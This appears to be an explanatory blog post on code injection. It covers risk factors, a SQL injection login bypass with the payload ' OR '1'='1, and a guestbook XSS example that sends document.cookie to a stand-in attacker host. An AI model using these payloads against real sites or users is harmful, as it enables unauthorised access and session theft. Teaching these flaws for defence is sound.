Code Injection
Code
Injection is the general term for attack types which consist of
injecting code that is then interpreted/ executed by the application.
This type of attack exploits poor handling of untrusted data. These
types of attacks are usually made possible due to a lack of proper
input/output data validation, for example:
-
allowed characters (standard regular expressions classes or custom)
-
data format
-
amount of expected data
Injection
flaws occur when an application sends untrusted data to an
interpreter. Injection flaws are very prevalent, particularly in
legacy code. They are often found in SQL,
LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP
Headers, program arguments, etc. Injection flaws are easy to discover
when examining code, but frequently hard to discover via testing.
Scanners and fuzzers can help attackers find injection flaws.
Code
Injection differs from Command Injection in that an attacker is only
limited by the functionality of the injected language itself. If an
attacker is able to inject PHP code into an application and have it
executed, he is only limited by what PHP is capable of. Command
injection consists of leveraging existing code to execute commands,
usually within the context of a shell.
Risk
Factors
-
These types of vulnerabilities can range from very hard to find, to easy to find
-
If found, are usually moderately hard to exploit, depending of scenario
-
If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability
-
Injection can sometimes lead to complete host takeover.
-
Arbitrarily modify values in a database through a type of code injection called SQL injection. The impact of this can range from website defacement to serious compromise of sensitive data.
-
Install malware or execute malevolent code on a server, by injecting server scripting code (such as PHP or ASP).
-
Privilege escalation to root permissions by exploiting Shell Injection vulnerabilities in a setuid root binary on UNIX, or Local System by exploiting a service on Windows.
-
Attacking web users with HTML/Script Injection (Cross-site scripting).
Examples of code injection
SQLinjection
SQL
injection takes advantage of the syntax of SQL
to inject commands that can read or modify a database, or compromise
the meaning of the original query.
For
example, consider a web page that has two fields to allow users to
enter a user name and a password. The code behind the page will
generate a SQL
query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password'
If this
query returns any rows, then access is granted. However, if the
malicious user enters a valid Username and injects some valid code
(
"password'
OR '1'='1"
) in the
Password field, then the resulting query will look like this:SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1'
In the example above, "Password"
is assumed to be blank or some innocuous string. "
'1'='1'
"
will always be true and many rows will be returned, thereby allowing
access.
The
technique may be refined to allow multiple statements to run, or even
to load up and run external programs.
HTML script injection
A web
server has a guestbook script, which accepts small messages from
users, and typically receives messages such as
Nice bravo!
However a malicious person may know of
a code injection vulnerability in the guestbook, and enters a message
such as
Bravo , u made it!.
document.location="http://hacker_attacker/cookie.cgi?" + document.cookie
If
another user views the page then the injected code will be executed.
This code can allow the attacker to impersonate another user. However
this same software bug can be accidentally triggered by an unassuming
user which will cause the website to display bad HTML code.
That post was awesome, >:)
HTML/Script injection is a popular
subject, commonly termed "Cross-Site Scripting", or "XSS".
XSS refers to an injection flaw whereby user input to a web script or
something along such lines is placed into the output HTML, without
being checked for HTML code or scripting.
Many of
these problems are related to erroneous assumptions of what input
data is possible, or the effects of special data.
Another
code injection vulnerabilities are
Comments
Post a Comment